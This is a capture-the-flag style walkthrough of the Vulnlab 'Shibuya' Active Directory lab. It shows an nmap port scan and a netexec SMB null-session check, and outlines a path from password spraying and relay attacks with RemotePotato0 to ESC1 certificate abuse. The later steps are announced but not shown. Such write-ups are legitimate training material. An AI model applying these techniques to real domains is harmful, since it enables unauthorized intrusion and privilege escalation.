Vulnlab Shibuya: Active Directory Penetration Testing Walkthrough
This comprehensive Vulnlab walkthrough details my step-by-step approach to compromising the Shibuya Active Directory environment. Starting with initial enumeration and discovery of a pre-created machine account, I leveraged various offensive security techniques including Kerberos authentication, password spraying, and registry hive extraction to gain a foothold. The attack path progressed through cross-session relay attacks and ultimately achieved domain admin privileges via vulnerable certificate templates (ESC1). This penetration testing guide demonstrates practical exploitation of common Active Directory security misconfigurations found in enterprise environments, providing valuable insights for both offensive security professionals and defenders.
Initial Enumeration
Initial port scan revealed multiple open ports indicating an Active Directory environment:
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_9.5 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory 3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services | Target_Name: SHIBUYA | NetBIOS_Domain_Name: SHIBUYA | NetBIOS_Computer_Name: AWSJPDC0522 | DNS_Domain_Name: shibuya.vl | DNS_Computer_Name: AWSJPDC0522.shibuya.vl | DNS_Tree_Name: shibuya.vl | Product_Version: 10.0.20348 |_ System_Time: 2025-04-09T09:02:13+00:00 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49939/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49965/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49997/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
SMB Enumeration
First, I checked for null sessions, but access was denied:
1
netexec smb shibuya.vl -u 'hello' -p '' --shares
User Enumeration
I used Kerbrute to identify valid users in the domain:
I discovered a machine account named RED$ which was pre-created. According to Microsoft documentation, these accounts can have their passwords changed:
BloodHound analysis revealed two users with active sessions: Simon.Watson (which we already owned) and Nigel.Mills. I decided to perform a cross-session relay attack to compromise Nigel.Mills’s account. First, I uploaded RemotePotato0 (which evades antivirus detection):